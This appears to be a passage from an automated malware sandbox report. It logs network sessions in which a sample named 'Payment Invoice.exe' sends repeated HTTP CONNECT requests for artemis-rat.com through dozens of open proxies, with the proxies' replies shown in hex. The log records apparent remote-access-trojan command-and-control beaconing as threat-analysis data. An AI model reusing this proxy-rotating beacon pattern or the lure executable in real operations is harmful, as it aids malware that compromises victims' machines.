                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:28.386483908 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1901192.168.2.455234184.170.245.14841457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:26.533504963 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1902192.168.2.45327846.209.54.11080807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:26.632400036 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:30.031717062 CET19INHTTP/1.1 200 OK
                                                                Mar 11, 2024 16:17:40.367527008 CET202INHTTP/1.0 504 Gateway Timeout
                                                                Content-Length: 735
                                                                Content-Type: text/html
                                                                Date: Sat, 02 Mar 2024 04:49:06 GMT
                                                                Expires: Sat, 02 Mar 2024 04:49:06 GMT
                                                                Server: Mikrotik HttpProxy
                                                                Connection: close


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1903192.168.2.453373149.210.235.10781187076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:26.632889032 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:27.403364897 CET132INHTTP/1.1 503 Too many open connections
                                                                Content-Type: text/plain
                                                                Connection: close
                                                                Data Raw: 4d 61 78 69 6d 75 6d 20 6e 75 6d 62 65 72 20 6f 66 20 6f 70 65 6e 20 63 6f 6e 6e 65 63 74 69 6f 6e 73 20 72 65 61 63 68 65 64 2e 0d 0a
                                                                Data Ascii: Maximum number of open connections reached.


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1904192.168.2.453532212.110.188.202344097076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:26.833388090 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:29.823832035 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:32.824024916 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:37.035557985 CET39INHTTP/1.1 200 Connection established


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1905192.168.2.453238213.79.104.22880807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:26.833775997 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:29.946019888 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:32.419092894 CET19INHTTP/1.1 200 OK


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1906192.168.2.45524145.11.95.16552197076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:26.846848011 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1907192.168.2.45328181.17.94.50343007076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:26.848045111 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:29.946185112 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:32.980237961 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:39.089484930 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1908192.168.2.45349537.26.86.20641457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:26.859596014 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1909192.168.2.45345951.159.221.176103097076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:26.887227058 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1910192.168.2.45346351.158.72.165163797076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:26.887335062 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:29.674500942 CET536INHTTP/1.0 501 Tor is not an HTTP Proxy
                                                                Content-Type: text/html; charset=iso-8859-1
                                                                Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69
                                                                Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please confi


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1911192.168.2.455242138.2.73.15710807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:26.915785074 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1912192.168.2.453452185.82.218.5210807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:26.922497034 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1913192.168.2.453410195.138.65.3456787076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:26.931163073 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1914192.168.2.45338186.110.27.16531287076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:26.937575102 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:29.946185112 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:31.377082109 CET19INHTTP/1.1 200 OK


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1915192.168.2.453399103.47.93.21010807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:26.946501970 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1916192.168.2.455167174.77.111.19641457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:26.982131958 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1917192.168.2.455244176.113.157.149374177076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:27.036684036 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1918192.168.2.455245194.213.208.22681807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:27.151798010 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:27.886368036 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:28.978494883 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:30.909595966 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:33.009282112 CET19INHTTP/1.1 200 OK


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1919192.168.2.45377481.250.223.126807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:27.224580050 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:30.238420010 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:34.469610929 CET805INHTTP/1.1 500 Internal Server Error
                                                                Date: Mon, 11 Mar 2024 15:15:34 GMT
                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                Content-Length: 613
                                                                Connection: close
                                                                Content-Type: text/html; charset=iso-8859-1
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 5b 6e 6f 20 61 64 64 72 65 73 73 20 67 69 76 65 6e 5d 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at [no address given] to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at artemis-rat.com Port 443</address></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1920192.168.2.45520885.239.121.16841457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:27.241095066 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1921192.168.2.455246119.3.215.4188887076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:27.246221066 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1922192.168.2.453765104.250.117.470707076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:27.257817030 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:30.323833942 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:33.324569941 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:39.328594923 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:51.323662996 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:58.553241968 CET536INHTTP/1.1 500 Internal Server Error
                                                                Date: Mon, 11 Mar 2024 15:15:58 GMT
                                                                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                                                Content-Length: 527
                                                                Connection: close
                                                                Content-Type: text/html; charset=iso-8859-1
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 72 6f 6f 74 40 6c 6f 63 61 6c 68 6f 73 74 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68
                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at root@localhost to inform th


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1923192.168.2.455235192.252.215.5161377076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:27.274442911 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1924192.168.2.45521845.125.222.97472397076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:27.311599970 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1925192.168.2.453847191.101.80.162807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:27.329679966 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:30.527031898 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:33.620702982 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
